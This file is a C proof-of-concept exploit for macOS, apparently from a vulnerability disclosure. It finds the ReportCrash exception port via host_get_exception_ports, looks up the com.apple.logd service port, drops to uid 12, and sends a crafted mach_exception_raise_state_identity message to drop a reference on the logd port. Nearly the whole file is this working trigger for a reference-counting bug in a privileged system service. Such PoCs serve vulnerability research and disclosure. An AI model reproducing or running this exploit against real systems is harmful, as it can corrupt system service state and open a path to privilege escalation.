Proof of concept. crash reporter vulnerably

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <unistd.h>
4. #include <servers/bootstrap.h>
5. #include <mach/mach.h>
6. #include <mach/task.h>
7.  
8. #include "mach_exc.h"
9. #include <mach/exception_types.h>
10.  
11.  
12. void drop_ref(mach_port_t report_crash_port, mach_port_t target_port) {
13. int flavor = 0;
14. mach_msg_type_number_t new_stateCnt = 0;
15. kern_return_t err = mach_exception_raise_state_identity(
16. report_crash_port,
17. target_port,
18. MACH_PORT_NULL,
19. 0,
20. 0,
21. 0,
22. &flavor,
23. NULL,
24. 0,
25. NULL,
26. &new_stateCnt);
27. }
28.  
29. int main() {
30. int uid = getuid();
31. if (uid != 0) {
32. printf("this PoC should be run as root\n");
33. return 0;
34. }
35. // take a look at our exception ports:
36. exception_mask_t masks[EXC_TYPES_COUNT] = {0};
37. mach_msg_type_number_t count = EXC_TYPES_COUNT;
38. mach_port_t ports[EXC_TYPES_COUNT] = {0};
39. exception_behavior_t behaviors[EXC_TYPES_COUNT] = {0};
40. thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {0};
41.  
42. kern_return_t err = host_get_exception_ports(mach_host_self(),
43. //kern_return_t err = task_get_exception_ports(mach_task_self(),
44. EXC_MASK_ALL,
45. masks,
46. &count,
47. ports,
48. behaviors,
49. flavors);
50.  
51. if (err != KERN_SUCCESS) {
52. printf("failed to get the exception ports\n");
53. return 0;
54. }
55.  
56. printf("count: %d\n", count);
57.  
58. mach_port_t report_crash_port = MACH_PORT_NULL;
59.  
60. for (int i = 0; i < count; i++) {
61. mach_port_t port = ports[i];
62. exception_mask_t mask = masks[i];
63.  
64. printf("port: %x %08x\n", port, mask);
65.  
66. if (mask & (1 << EXC_RESOURCE)) {
67. report_crash_port = port;
68. }
69. }
70.  
71. if (report_crash_port == MACH_PORT_NULL) {
72. printf("couldn't find ReportCrash port\n");
73. return 0;
74. }
75.  
76. printf("report crash port: 0x%x\n", report_crash_port);
77.  
78. // the port we will target:
79. mach_port_t bs = MACH_PORT_NULL;
80. task_get_bootstrap_port(mach_task_self(), &bs);
81. printf("targeting bootstrap port: %x\n", bs);
82.  
83. mach_port_t service_port = MACH_PORT_NULL;
84. err = bootstrap_look_up(bs, "com.apple.logd", &service_port);
85. if(err != KERN_SUCCESS){
86. printf("unable to look up target service\n");
87. return 0;
88. }
89. printf("got service: 0x%x\n", service_port);
90.  
91. // triggering the bug requires that we send from a different uid
92. // drop to everyone(12)
93.  
94. int setuiderr = setuid(12);
95. if (setuiderr != 0) {
96. printf("setuid failed...\n");
97. return 0;
98. }
99. printf("dropped to uid 12\n");
100.  
101. drop_ref(report_crash_port, service_port);
102.  
103. return 0;
104. }